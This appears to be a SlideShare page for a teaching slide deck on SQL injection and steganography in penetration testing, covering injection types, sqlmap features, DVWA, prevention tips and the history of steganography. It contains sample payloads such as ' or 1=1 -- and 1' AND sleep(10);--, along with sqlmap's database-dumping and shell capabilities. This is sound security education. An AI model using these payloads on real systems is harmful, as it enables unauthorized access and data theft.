KEMBAR78
SQL Injection Stegnography in Pen Testing | PPTX
Uploaded by191013607gouthamsric
PPTX, PDF58 views

SQL Injection Stegnography in Pen Testing

SQL injection is a code injection technique used to exploit vulnerabilities in data-driven applications by inserting malicious SQL statements. This technique allows attackers to execute unauthorized actions such as extracting, modifying, or deleting data. Notable cases include the theft of 130 million credit card numbers in 2009 and widespread attacks on Microsoft's SQL server in 2008, highlighting the critical need for prevention measures like input validation and the use of web application firewalls.

Download to read offline
• SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution • This is a method to attack web applications that have a data repository. • The attacker would send a specially crafted SQL statement that is designed to cause some malicious action.
• Determining database schema • Extracting data • Adding or modifying data • Bypassing authentication
• On August 17, 2009, the United States Justice Department charged an American citizen Albert Gonzalez and two Russians with the theft of 130 million credit card numbers using an SQL injection attack. • In 2008 a sweep of attacks began exploiting the SQL injection vulnerabilities of Microsoft's IIS web server and SQL database server. Over 500,000 sites were exploited.
• The ability to inject SQL commands into the database engine through an existing application • SQL injection is the use of publicly available fields to gain entry to your database. • This is done by entering SQL commands into your form fields instead of the expected data. • Improperly coded forms will allow a hacker to use them as an entry point to your database
1. App sends form to user. 2. Attacker submits form with SQL exploit data. 3. Application builds string with exploit data. 4. Application sends SQL query to DB. 5. DB executes query, including exploit, sends data back to application. 6. Application returns data to user. DB Server Web Server Attacker Firewall User Pass ‘ or 1=1-- Form
Unauthorized Access Attempt: password = ’ or 1=1 -- SQL statement becomes: select count(*) from users where username = ‘user’ and password = ‘’ or 1=1 -- Checks if password is empty OR 1=1, which is always true, permitting access.
1. Leakage of sensitive information. 2. Reputation decline. 3. Modification of sensitive information. 4. Loss of control of db server. 5. Data loss. 6. Denial of service.
1. First order attacks • The attacker can simply enter a malicious string and cause the modified code to be executed immediately 2. Second order attacks • The attacker injects into a persistent storage (such as a table row) which is deemed as a trusted source.
3. Lateral Injection The attacker can manipulate the implicit function To_Char() by changing the values of the environment Variable.
• Injection through user input • Injection through cookies • Injection through server variables First order injection
SQL Injection Types 1.Error-based SQL Injection 2.UNION-based SQL Injection 3.Blind SQL Injection 4.Boolean Based SQL Injection 5.Time-based SQL injection
SQL Injection Types
Error-based SQL Injection • One of the most common types of SQL Injection vulnerabilities, it is also quite easy to determine. • It relies on feeding unexpected commands or invalid input, typically through a user interface, to cause the database server to reply with an error that may contain details about the target structure, version, operating system, and even to return full query results.
Error-based SQL Injection
Error-based SQL Injection •Error-based SQL injection is an In-band injection technique that enables threat actors to exploit error output from the database to manipulate its data. •It manipulates the database into generating an error that informs the actor of the database’s structure. •In-band injection enables threat actors to utilize one communication channel to launch an attack and retrieve data. •It requires using a vulnerability to force data extraction. •Vulnerability allows code to output an SQL error from the server instead of the required data. •This error enables the actor to understand the entire database structure.
Example: Adding SQL Syntax to User Input •In error-based SQL injection, the attacker tries to insert a malicious query with the goal of receiving an error message that provides sensitive information about the database. •The attacker might try any type of SQL command in an input field parameter—such as a single quote, double quote, or SQL operators like AND, OR, NOT.
Example: Adding SQL Syntax to User Input This example shows a URL that accepts a parameter from the user, in this case the required item: https://example.com/index.php?item=123 The attacker can try adding a single quote at the end of the parameter value: https://example.com/index.php?name=123’ If the database returns an error like this, the attack succeeded: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘VALUE’’.
Error-based SQL Injection This error message provides the attacker with: Information about the database used—MySQL The exact syntax that caused the error—single quote Where the syntax error occurred in the query—after the parameter value For an experienced attacker, this is enough to see that the server is connected to the database insecurely and plan additional SQL injection attacks that can cause damage. The attacker can also easily automate this using a command like grep extract to try many SQL syntax options in an input parameter and see which ones return errors.
Error-Based SQL Injection Prevention
•When an application is vulnerable to SQL injection and the results of the query are returned within the application's responses, the UNION keyword can be used to retrieve data from other tables within the database. •This results in an SQL injection UNION attack. Union-based SQL Injection
Union example • Union keyword helps to execute one or more additional “Select” queries and append the results to the original query. • Eg., select a, b from table1 union select c, d from table2 • The query returns a single result with two columns containing values from the columns a and b in table1 and columns c, d oftable2 • Conditions to be met for a union query to work: • Individual queries must return the same number of columns • Data types in each column must be compatible between the individual queries.
Time-based SQL Injection • This type of blind SQL Injection relies on waiting for a specific period before a vulnerable application responds to an attacker’s queries tailored with a time delay value. • The success of the attack is based on the time taken by the application to deliver the response.
Time-based SQL Injection 1' AND sleep(10);- - Because we forced a delayed response of 10 seconds, the reply comes when this period expires.
• The SQLMAP penetration testing tool is used to test whether a website is safe from SQL injection. • sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. SQL Map
• sqlmap is an open source penetration testing tool • Automates the process of detecting and exploiting SQL injection flaws • Powerful detection engine • Has many features for the ultimate penetration tester • Has broad range of switches lasting from database fingerprinting, over data fetching from the database, etc.. SQL Map
• Full support for • MySQL • Oracle • PostgreSQL • Microsoft SQL Server • Microsoft Access • IBM DB2 • SQLite • Firebird • Sybase • SAP MaxDB database management systems. SQL Map Features Full support for six SQL injection techniques: •boolean-based blind, •time-based blind, •error-based, •UNION query, •stacked queries and •out-of-band.
• Support to • Directly connect to the database without passing via a SQL injection; provides DBMS credentials, IP address, port and database name. • Dump database tables entirely, a range of entries or specific columns as per user’s choice. • Search for specific database names, specific tables across all databases or specific columns across all databases’ tables. • Download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server. SQL Map Features
• Support to: • Execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server. • Establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice. • Database process user privilege escalation via Metasploit’s Meterpreter getsystem command. SQL Map Features
Installing SQL Map SQLMAP comes pre – installed with kali linux, which is the preferred choice of most penetration testers. However, you can install sqlmap on other debian based linux systems using the command sudo apt-get install sqlmap
Using SQLMAP to test a website for SQL Injection vulnerability: Step 1: List information about the existing databases Step 2: List information about Tables present in a particular Database Step 3: List information about the columns of a particular table Step 4: Dump the data from the columns
• Websites require constant access to the database. • Firewalls provide little or no defense against SQL injection attacks. • Antivirus programs are equally ineffective at blocking SQL injection attacks. Reasons for SQL Injection vulnerability
How to Prevent SQL Injections (SQLi) – Generic Tips Step 1: Train and maintain awareness Step 2: Do not trust any user input Step 3: Use whitelists, not blacklists Step 4: Adopt the latest technologies Step 5: Employ verified mechanisms Step 6: Scan regularly
1. Comprehensive data sanitization • Web sites must filter all user input • For example, e-mail addresses should be filtered to allow only the characters allowed in an e-mail address. • Its SQL injection defenses can catch most attempts to sneak SQL through web channels.
2. Use a web application firewall • A popular example is the free, open source module ModSecurity. • ModSecurity provides a sophisticated and ever-evolving set of rules to filter potentially dangerous web requests.
3. Limit database privileges by context • Create multiple database user accounts with the minimum levels of privilege for their usage environment. • For example, the code behind a login page should query the database using an account limited only to the relevent credentials table. • This way, a breach through this channel cannot be leveraged to compromise the entire database.
4. Avoid constructing SQL queries with user input • Even data sanitization routines can be flawed. • Using SQL variable binding with prepared statements or stored procedures is much safer than constructing full queries.
• BSQL Hacker • SQLmap • SQLninja • Safe3 SQL Injector • SQLSus • Mole • Havij
• SQL injection is technique for exploiting applications that use relational databases as their back end. • Applications compose SQL statements and send to database. • SQL injection use the fact that many of these applications concatenate the fixed part of SQL statement with user-supplied data that forms WHERE predicates or additional sub-queries.
• The technique is based on malformed user- supplied data • Transform the innocent SQL calls to a malicious call • Cause unauthorized access, deletion of data, or theft of information • All databases can be a target of SQL injection and all are vulnerable to this technique. • The vulnerability is in the application layer outside of the database, and the moment that the application has a connection into the database.
VIDEO REFERENCES • https://www.youtube.com/watch?v=3Axp3VDnf0I • https://www.youtube.com/watch?v=FHCTfA9cCXs&list= RDCMUCBwRiON-FWnUJiaJVZhnHPg&start_radio=1 • https://www.youtube.com/watch?v=5ArJJXnsuYI
Damn Vulnerable Web App (DVWA) • Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn defenseless. • Its primary objective is to be a guide for Web Security experts to test their abilities and instruments in a lawful domain.
Attacks in DVWA 1. Brute Force 2. Command Execution 3. CSRF 4. File Inclusion 5. SQL Injection 6. SQL Injection (Blind) 7. Shell Uploading 8. XSS ( Reflected ) 9. XSS ( Stored)
DVWA Security Options for Attacks: • Low Level : freedom to exploit all known vulnerabilities • Medium Level : will have all entry level validations and filtration • High Level : tight Security
Installation • DVWA is a web application coded in PHP that uses a MySQL back-end database. • DVWA needs a web server, PHP and MySQL installed in order to run. • The easiest way to install DVWA is to download and install 'XAMPP'.
STEGAN-O-GRAPHY
What is Steganography?  Steganography is the art and science of writing hidden messages in such a way that no one, apart from the sender and intended recipient, suspects the existence of the message,  It is a form of security through obscurity.  The word steganography is of Greek origin and means "concealed writing" from the Greek words steganos meaning "covered or protected", and graphein meaning "writing".  “Steganography means hiding one piece of data within another”.
Example Since everyone can read, encoding text in neutral sentences is doubtfully effective
Example Since everyone can read, encoding text in neutral sentences is doubtfully effective Since Everyone Can Read, Encoding Text In Neutral Sentences Is Doubtfully Effective
Example Since everyone can read, encoding text in neutral sentences is doubtfully effective Since Everyone Can Read, Encoding Text In Neutral Sentences Is Doubtfully Effective „Secret inside’
 “The goal of steganography is to hide messages in such a way that no one apart from the intended recipient even knows that a message has been sent.”  This can be achieved by concealing the existence of information within seemingly harmless carriers or cover  It can be understand by the following figure.
History Of Steganography  The first recorded uses of steganography can be traced back to 440 BC when Herodotus mentions two examples of steganography in his Histories.  Demaratus sent a warning about a forthcoming attack to Greece by writing it directly on the wooden backing of a wax tablet before applying its beeswax surface.  Wax tablets were in common use then as reusable writing surfaces, sometimes used for shorthand.  Ancient Chinese wrote messages on fine silk, which was then crunched into a tiny ball and covered in wax. The messenger then swallowed the ball of wax.  Special “inks” were important steganographic tools even during Second World War.  During Second World War a technique was developed to shrink photographically a page of text into a dot less than one millimeter in diameter, and then hide this microdot in an apparently innocuous letter. (The first microdot has been spotted
Physical Techniques  Physical Techniques  Hidden messages within wax tablets  Hidden messages on messenger's body  Hidden messages on paper written in secret inks  Messages written in Morse code on knitting yarn and then knitted into a piece of clothing worn by a courier  Messages written on envelopes in the area covered by postage stamps.
Digital Techniques  Digital Techniques  Concealing messages within the lowest bits of noisy images or sound files.  Chaffing and winnowing.  Modifying the echo of a sound file (Echo Steganography)  Including data in ignored sections of a file, such as after the logical end of the carrier file.
Combined Crypto-Steganography Invisible Merge Steganograph y Encryption
Basic Steganography Model
Steganography Terms  Carrier or Cover File - A Original message or a file in which hidden information will be stored inside of it .  Stego-Medium - The medium in which the information is hidden.  Embedded or Payload - The information which is to be hidden or concealed.  Steganalysis - The process of detecting hidden information inside a file.
 Steganography in “TEXT”  Steganography in “IMAGES”  Steganography in “AUDIO”
Text Steganography Methods  Text Steganography in Markup Languages[HTML]  Text Steganography in Specific characters in words  Line shifting Method  Word shifting  Open spaces  Semantic methods  Character Encoding
Examples of Text Steganography
Image Steganography  Using image files as hosts for steganographic messages takes advantage of the limited capabilities of the human visual system
Audio Steganography  Embedding secret messages into digital sound is known as audio Steganography.
Audio Steganography  Toembed data secretly onto digital audio file there are few techniques introduced :  LSB Coding  Phase Coding  Parity Coding  Spread Spectrum
 Steganalysis is the art and science of detecting a secret communication.  Hiding a message will most likely leave detectable traces in the cover medium.  The information hiding process changes the statistical properties of the cover, which is a steganalyst attempts to detect.  The process of attempting to detect statistical traces is called statistical steganalysis.
IMPORTANT ASPECTS OF STEGANALYSIS  DETECTING HIDDEN INFORMATION  DISABLING STEGANOGRAPHY
SQL Injection Stegnography in Pen Testing
SQL Injection Stegnography in Pen Testing
SQL Injection Stegnography in Pen Testing
SQL Injection Stegnography in Pen Testing

More Related Content

PPTX
SQL INJECTION
byAnoop T
 
PDF
SQL Injection
byAbhinav Nair
 
PDF
Sql injection manish file
byyukta888
 
PDF
Practical Approach towards SQLi ppt
byAhamed Saleem
 
PDF
Full MSSQL Injection PWNage
byPrathan Phongthiproek
 
PPSX
Web application security
bywww.netgains.org
 
PPTX
Web application penetration using SQLMAP.
byasmitaanpat
 
DOCX
Understanding SQL Injection_ A Guide to Website Security.docx
byOscp Training
 
SQL INJECTION
byAnoop T
 
SQL Injection
byAbhinav Nair
 
Sql injection manish file
byyukta888
 
Practical Approach towards SQLi ppt
byAhamed Saleem
 
Full MSSQL Injection PWNage
byPrathan Phongthiproek
 
Web application security
bywww.netgains.org
 
Web application penetration using SQLMAP.
byasmitaanpat
 
Understanding SQL Injection_ A Guide to Website Security.docx
byOscp Training
 

Similar to SQL Injection Stegnography in Pen Testing

PPT
SQL injection and buffer overflows are hacking techniques used to exploit wea...
bybankservicehyd
 
PPTX
Sql Injection
byAju Thomas
 
PPTX
SQL INJECTION
byZiaullah Khan
 
PDF
Think Like a Hacker - Database Attack Vectors
byMark Ginnebaugh
 
PPTX
Sql injection
byNuruzzaman Milon
 
PPT
PHP - Introduction to Advanced SQL
byVibrant Technologies & Computers
 
PDF
SQL Injection
byMagno Logan
 
PPTX
Sql injection
bySuraj Tiwari
 
PDF
Op2423922398
byIJERA Editor
 
PPTX
SQL Injections - 2016 - Huntington Beach
byJeff Prom
 
PDF
SQL injection: Not Only AND 1=1 (updated)
byBernardo Damele A. G.
 
PPTX
Sql injection
byMathewHarrison3
 
PPT
Sql injection
byPallavi Biswas
 
PPTX
Sql injection attack
byRaghav Bisht
 
PDF
Sql injection
bySafwan Hashmi
 
PPTX
Sql injections (Basic bypass authentication)
byRavindra Singh Rathore
 
PDF
SQL Injection Attack Guide for ethical hacking
byAyan Live Rourkela
 
PPT
Sql injection
byNitish Kumar
 
PPTX
Code injection and green sql
byKaustav Sengupta
 
PPTX
Greensql2007
byKaustav Sengupta
 
SQL injection and buffer overflows are hacking techniques used to exploit wea...
bybankservicehyd
 
Sql Injection
byAju Thomas
 
SQL INJECTION
byZiaullah Khan
 
Think Like a Hacker - Database Attack Vectors
byMark Ginnebaugh
 
Sql injection
byNuruzzaman Milon
 
PHP - Introduction to Advanced SQL
byVibrant Technologies & Computers
 
SQL Injection
byMagno Logan
 
Sql injection
bySuraj Tiwari
 
Op2423922398
byIJERA Editor
 
SQL Injections - 2016 - Huntington Beach
byJeff Prom
 
SQL injection: Not Only AND 1=1 (updated)
byBernardo Damele A. G.
 
Sql injection
byMathewHarrison3
 
Sql injection
byPallavi Biswas
 
Sql injection attack
byRaghav Bisht
 
Sql injection
bySafwan Hashmi
 
Sql injections (Basic bypass authentication)
byRavindra Singh Rathore
 
SQL Injection Attack Guide for ethical hacking
byAyan Live Rourkela
 
Sql injection
byNitish Kumar
 
Code injection and green sql
byKaustav Sengupta
 
Greensql2007
byKaustav Sengupta
 

Recently uploaded

PPTX
Basics for Conducting Bibliometric Analysis - Dr Ahsan Riaz
bySystematic Reviews Network (SRN)
 
DOCX
Extension Education: From theory to practice by Dr Subin K Mohan.docx
byDrSubinKMohan
 
PDF
Unofficial Draft by Simanchala Sarab: #GNDU #B.A. B.Ed. (#ITEP) #Pre-Interns...
bySimanchala Sarab, BABed(ITEP Secondary stage) in History student at GNDU Amritsar
 
PDF
Admin Slides for Oct'25 semester - PBO - MC1.pdf
byMark Kor
 
PPTX
How to Create a Manifest File in Odoo 18
byCeline George
 
PDF
BD1TL - TNTEU - Teaching and Learning - Unit - 2.pdf
byDr Raja Mohammed T
 
PDF
Yaksha Prashna | General Quiz at RLAC | Amlan Sarkar | Full Set
byAmlan Sarkar
 
PDF
Slit lamp parts 2/ppt/notes/download.pdf
byAnmol Singh
 
PPTX
psychoanalytic Theory.pptx, MSc. Nursing
byKomalJaiswal46
 
PDF
Who Owns the Narrative? Data, Disinformation, and the Missing Voice of Academia
byIsmail Fahmi
 
PDF
Nernst Distribution Law and factors affecting distribution constant
byMithil Fal Desai
 
PPTX
Nerve lecture 2:strength-duration curve and an introduction to action potential
bydina merzeban
 
PDF
Admin Slides for Oct'25 semester - PB1_MC5.pdf
byGreat Files
 
PPTX
Common problems or challenges faced by Indian adolescents
byDr. Harpal Kaur
 
PDF
The purpose of Ethics and Values in a project context webinar, 14 October 202...
byAssociation for Project Management
 
PPTX
Capital Budgeting - Risk Analysis Using Payback Period Method
bySundar B N
 
PDF
TUYỂN CHỌN 30 ĐỀ THI CHỌN HỌC SINH GIỎI LỚP 9 CÁC TỈNH NĂM 2024-2025 MÔN TIẾN...
byNguyen Thanh Tu Collection
 
PPTX
DPSM-BITDA Introduction Presentation Slides
byGreat Files
 
PPTX
Welcome to our Open Evening 2025 Ballinrobe CS
byjacollins1515
 
PDF
Phase Equilibria and Colligative Properties.pdf
byMithil Fal Desai
 
Basics for Conducting Bibliometric Analysis - Dr Ahsan Riaz
bySystematic Reviews Network (SRN)
 
Extension Education: From theory to practice by Dr Subin K Mohan.docx
byDrSubinKMohan
 
Unofficial Draft by Simanchala Sarab: #GNDU #B.A. B.Ed. (#ITEP) #Pre-Interns...
bySimanchala Sarab, BABed(ITEP Secondary stage) in History student at GNDU Amritsar
 
Admin Slides for Oct'25 semester - PBO - MC1.pdf
byMark Kor
 
How to Create a Manifest File in Odoo 18
byCeline George
 
BD1TL - TNTEU - Teaching and Learning - Unit - 2.pdf
byDr Raja Mohammed T
 
Yaksha Prashna | General Quiz at RLAC | Amlan Sarkar | Full Set
byAmlan Sarkar
 
Slit lamp parts 2/ppt/notes/download.pdf
byAnmol Singh
 
psychoanalytic Theory.pptx, MSc. Nursing
byKomalJaiswal46
 
Who Owns the Narrative? Data, Disinformation, and the Missing Voice of Academia
byIsmail Fahmi
 
Nernst Distribution Law and factors affecting distribution constant
byMithil Fal Desai
 
Nerve lecture 2:strength-duration curve and an introduction to action potential
bydina merzeban
 
Admin Slides for Oct'25 semester - PB1_MC5.pdf
byGreat Files
 
Common problems or challenges faced by Indian adolescents
byDr. Harpal Kaur
 
The purpose of Ethics and Values in a project context webinar, 14 October 202...
byAssociation for Project Management
 
Capital Budgeting - Risk Analysis Using Payback Period Method
bySundar B N
 
TUYỂN CHỌN 30 ĐỀ THI CHỌN HỌC SINH GIỎI LỚP 9 CÁC TỈNH NĂM 2024-2025 MÔN TIẾN...
byNguyen Thanh Tu Collection
 
DPSM-BITDA Introduction Presentation Slides
byGreat Files
 
Welcome to our Open Evening 2025 Ballinrobe CS
byjacollins1515
 
Phase Equilibria and Colligative Properties.pdf
byMithil Fal Desai
 

SQL Injection Stegnography in Pen Testing

  • 2.
    • SQL injectionis a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution • This is a method to attack web applications that have a data repository. • The attacker would send a specially crafted SQL statement that is designed to cause some malicious action.
  • 3.
    • Determining databaseschema • Extracting data • Adding or modifying data • Bypassing authentication
  • 4.
    • On August17, 2009, the United States Justice Department charged an American citizen Albert Gonzalez and two Russians with the theft of 130 million credit card numbers using an SQL injection attack. • In 2008 a sweep of attacks began exploiting the SQL injection vulnerabilities of Microsoft's IIS web server and SQL database server. Over 500,000 sites were exploited.
  • 5.
    • The abilityto inject SQL commands into the database engine through an existing application • SQL injection is the use of publicly available fields to gain entry to your database. • This is done by entering SQL commands into your form fields instead of the expected data. • Improperly coded forms will allow a hacker to use them as an entry point to your database
  • 6.
    1. App sendsform to user. 2. Attacker submits form with SQL exploit data. 3. Application builds string with exploit data. 4. Application sends SQL query to DB. 5. DB executes query, including exploit, sends data back to application. 6. Application returns data to user. DB Server Web Server Attacker Firewall User Pass ‘ or 1=1-- Form
  • 8.
    Unauthorized Access Attempt: password= ’ or 1=1 -- SQL statement becomes: select count(*) from users where username = ‘user’ and password = ‘’ or 1=1 -- Checks if password is empty OR 1=1, which is always true, permitting access.
  • 9.
    1. Leakage ofsensitive information. 2. Reputation decline. 3. Modification of sensitive information. 4. Loss of control of db server. 5. Data loss. 6. Denial of service.
  • 10.
    1. First orderattacks • The attacker can simply enter a malicious string and cause the modified code to be executed immediately 2. Second order attacks • The attacker injects into a persistent storage (such as a table row) which is deemed as a trusted source.
  • 11.
    3. Lateral Injection Theattacker can manipulate the implicit function To_Char() by changing the values of the environment Variable.
  • 12.
    • Injection throughuser input • Injection through cookies • Injection through server variables First order injection
  • 13.
    SQL Injection Types 1.Error-basedSQL Injection 2.UNION-based SQL Injection 3.Blind SQL Injection 4.Boolean Based SQL Injection 5.Time-based SQL injection
  • 14.
  • 15.
    Error-based SQL Injection •One of the most common types of SQL Injection vulnerabilities, it is also quite easy to determine. • It relies on feeding unexpected commands or invalid input, typically through a user interface, to cause the database server to reply with an error that may contain details about the target structure, version, operating system, and even to return full query results.
  • 18.
  • 19.
    Error-based SQL Injection •Error-basedSQL injection is an In-band injection technique that enables threat actors to exploit error output from the database to manipulate its data. •It manipulates the database into generating an error that informs the actor of the database’s structure. •In-band injection enables threat actors to utilize one communication channel to launch an attack and retrieve data. •It requires using a vulnerability to force data extraction. •Vulnerability allows code to output an SQL error from the server instead of the required data. •This error enables the actor to understand the entire database structure.
  • 20.
    Example: Adding SQLSyntax to User Input •In error-based SQL injection, the attacker tries to insert a malicious query with the goal of receiving an error message that provides sensitive information about the database. •The attacker might try any type of SQL command in an input field parameter—such as a single quote, double quote, or SQL operators like AND, OR, NOT.
  • 21.
    Example: Adding SQLSyntax to User Input This example shows a URL that accepts a parameter from the user, in this case the required item: https://example.com/index.php?item=123 The attacker can try adding a single quote at the end of the parameter value: https://example.com/index.php?name=123’ If the database returns an error like this, the attack succeeded: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘VALUE’’.
  • 22.
    Error-based SQL Injection Thiserror message provides the attacker with: Information about the database used—MySQL The exact syntax that caused the error—single quote Where the syntax error occurred in the query—after the parameter value For an experienced attacker, this is enough to see that the server is connected to the database insecurely and plan additional SQL injection attacks that can cause damage. The attacker can also easily automate this using a command like grep extract to try many SQL syntax options in an input parameter and see which ones return errors.
  • 23.
  • 24.
    •When an applicationis vulnerable to SQL injection and the results of the query are returned within the application's responses, the UNION keyword can be used to retrieve data from other tables within the database. •This results in an SQL injection UNION attack. Union-based SQL Injection
  • 25.
    Union example • Unionkeyword helps to execute one or more additional “Select” queries and append the results to the original query. • Eg., select a, b from table1 union select c, d from table2 • The query returns a single result with two columns containing values from the columns a and b in table1 and columns c, d oftable2 • Conditions to be met for a union query to work: • Individual queries must return the same number of columns • Data types in each column must be compatible between the individual queries.
  • 32.
    Time-based SQL Injection •This type of blind SQL Injection relies on waiting for a specific period before a vulnerable application responds to an attacker’s queries tailored with a time delay value. • The success of the attack is based on the time taken by the application to deliver the response.
  • 33.
    Time-based SQL Injection 1'AND sleep(10);- - Because we forced a delayed response of 10 seconds, the reply comes when this period expires.
  • 34.
    • The SQLMAPpenetration testing tool is used to test whether a website is safe from SQL injection. • sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. SQL Map
  • 35.
    • sqlmap isan open source penetration testing tool • Automates the process of detecting and exploiting SQL injection flaws • Powerful detection engine • Has many features for the ultimate penetration tester • Has broad range of switches lasting from database fingerprinting, over data fetching from the database, etc.. SQL Map
  • 36.
    • Full supportfor • MySQL • Oracle • PostgreSQL • Microsoft SQL Server • Microsoft Access • IBM DB2 • SQLite • Firebird • Sybase • SAP MaxDB database management systems. SQL Map Features Full support for six SQL injection techniques: •boolean-based blind, •time-based blind, •error-based, •UNION query, •stacked queries and •out-of-band.
  • 37.
    • Support to •Directly connect to the database without passing via a SQL injection; provides DBMS credentials, IP address, port and database name. • Dump database tables entirely, a range of entries or specific columns as per user’s choice. • Search for specific database names, specific tables across all databases or specific columns across all databases’ tables. • Download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server. SQL Map Features
  • 38.
    • Support to: •Execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server. • Establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice. • Database process user privilege escalation via Metasploit’s Meterpreter getsystem command. SQL Map Features
  • 39.
    Installing SQL Map SQLMAPcomes pre – installed with kali linux, which is the preferred choice of most penetration testers. However, you can install sqlmap on other debian based linux systems using the command sudo apt-get install sqlmap
  • 40.
    Using SQLMAP totest a website for SQL Injection vulnerability: Step 1: List information about the existing databases Step 2: List information about Tables present in a particular Database Step 3: List information about the columns of a particular table Step 4: Dump the data from the columns
  • 41.
    • Websites requireconstant access to the database. • Firewalls provide little or no defense against SQL injection attacks. • Antivirus programs are equally ineffective at blocking SQL injection attacks. Reasons for SQL Injection vulnerability
  • 42.
    How to PreventSQL Injections (SQLi) – Generic Tips Step 1: Train and maintain awareness Step 2: Do not trust any user input Step 3: Use whitelists, not blacklists Step 4: Adopt the latest technologies Step 5: Employ verified mechanisms Step 6: Scan regularly
  • 43.
    1. Comprehensive datasanitization • Web sites must filter all user input • For example, e-mail addresses should be filtered to allow only the characters allowed in an e-mail address. • Its SQL injection defenses can catch most attempts to sneak SQL through web channels.
  • 44.
    2. Use aweb application firewall • A popular example is the free, open source module ModSecurity. • ModSecurity provides a sophisticated and ever-evolving set of rules to filter potentially dangerous web requests.
  • 45.
    3. Limit databaseprivileges by context • Create multiple database user accounts with the minimum levels of privilege for their usage environment. • For example, the code behind a login page should query the database using an account limited only to the relevent credentials table. • This way, a breach through this channel cannot be leveraged to compromise the entire database.
  • 46.
    4. Avoid constructingSQL queries with user input • Even data sanitization routines can be flawed. • Using SQL variable binding with prepared statements or stored procedures is much safer than constructing full queries.
  • 47.
    • BSQL Hacker •SQLmap • SQLninja • Safe3 SQL Injector • SQLSus • Mole • Havij
  • 48.
    • SQL injectionis technique for exploiting applications that use relational databases as their back end. • Applications compose SQL statements and send to database. • SQL injection use the fact that many of these applications concatenate the fixed part of SQL statement with user-supplied data that forms WHERE predicates or additional sub-queries.
  • 49.
    • The techniqueis based on malformed user- supplied data • Transform the innocent SQL calls to a malicious call • Cause unauthorized access, deletion of data, or theft of information • All databases can be a target of SQL injection and all are vulnerable to this technique. • The vulnerability is in the application layer outside of the database, and the moment that the application has a connection into the database.
  • 50.
    VIDEO REFERENCES • https://www.youtube.com/watch?v=3Axp3VDnf0I •https://www.youtube.com/watch?v=FHCTfA9cCXs&list= RDCMUCBwRiON-FWnUJiaJVZhnHPg&start_radio=1 • https://www.youtube.com/watch?v=5ArJJXnsuYI
  • 51.
    Damn Vulnerable WebApp (DVWA) • Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn defenseless. • Its primary objective is to be a guide for Web Security experts to test their abilities and instruments in a lawful domain.
  • 52.
    Attacks in DVWA 1.Brute Force 2. Command Execution 3. CSRF 4. File Inclusion 5. SQL Injection 6. SQL Injection (Blind) 7. Shell Uploading 8. XSS ( Reflected ) 9. XSS ( Stored)
  • 53.
    DVWA Security Optionsfor Attacks: • Low Level : freedom to exploit all known vulnerabilities • Medium Level : will have all entry level validations and filtration • High Level : tight Security
  • 54.
    Installation • DVWA isa web application coded in PHP that uses a MySQL back-end database. • DVWA needs a web server, PHP and MySQL installed in order to run. • The easiest way to install DVWA is to download and install 'XAMPP'.
  • 55.
  • 56.
    What is Steganography? Steganography is the art and science of writing hidden messages in such a way that no one, apart from the sender and intended recipient, suspects the existence of the message,  It is a form of security through obscurity.  The word steganography is of Greek origin and means "concealed writing" from the Greek words steganos meaning "covered or protected", and graphein meaning "writing".  “Steganography means hiding one piece of data within another”.
  • 57.
    Example Since everyone canread, encoding text in neutral sentences is doubtfully effective
  • 58.
    Example Since everyone canread, encoding text in neutral sentences is doubtfully effective Since Everyone Can Read, Encoding Text In Neutral Sentences Is Doubtfully Effective
  • 59.
    Example Since everyone canread, encoding text in neutral sentences is doubtfully effective Since Everyone Can Read, Encoding Text In Neutral Sentences Is Doubtfully Effective „Secret inside’
  • 60.
     “The goalof steganography is to hide messages in such a way that no one apart from the intended recipient even knows that a message has been sent.”  This can be achieved by concealing the existence of information within seemingly harmless carriers or cover  It can be understand by the following figure.
  • 61.
    History Of Steganography The first recorded uses of steganography can be traced back to 440 BC when Herodotus mentions two examples of steganography in his Histories.  Demaratus sent a warning about a forthcoming attack to Greece by writing it directly on the wooden backing of a wax tablet before applying its beeswax surface.  Wax tablets were in common use then as reusable writing surfaces, sometimes used for shorthand.  Ancient Chinese wrote messages on fine silk, which was then crunched into a tiny ball and covered in wax. The messenger then swallowed the ball of wax.  Special “inks” were important steganographic tools even during Second World War.  During Second World War a technique was developed to shrink photographically a page of text into a dot less than one millimeter in diameter, and then hide this microdot in an apparently innocuous letter. (The first microdot has been spotted
  • 62.
    Physical Techniques  PhysicalTechniques  Hidden messages within wax tablets  Hidden messages on messenger's body  Hidden messages on paper written in secret inks  Messages written in Morse code on knitting yarn and then knitted into a piece of clothing worn by a courier  Messages written on envelopes in the area covered by postage stamps.
  • 63.
    Digital Techniques  DigitalTechniques  Concealing messages within the lowest bits of noisy images or sound files.  Chaffing and winnowing.  Modifying the echo of a sound file (Echo Steganography)  Including data in ignored sections of a file, such as after the logical end of the carrier file.
  • 65.
  • 66.
  • 67.
    Steganography Terms  Carrieror Cover File - A Original message or a file in which hidden information will be stored inside of it .  Stego-Medium - The medium in which the information is hidden.  Embedded or Payload - The information which is to be hidden or concealed.  Steganalysis - The process of detecting hidden information inside a file.
  • 68.
     Steganography in“TEXT”  Steganography in “IMAGES”  Steganography in “AUDIO”
  • 69.
    Text Steganography Methods Text Steganography in Markup Languages[HTML]  Text Steganography in Specific characters in words  Line shifting Method  Word shifting  Open spaces  Semantic methods  Character Encoding
  • 71.
    Examples of TextSteganography
  • 72.
    Image Steganography  Usingimage files as hosts for steganographic messages takes advantage of the limited capabilities of the human visual system
  • 74.
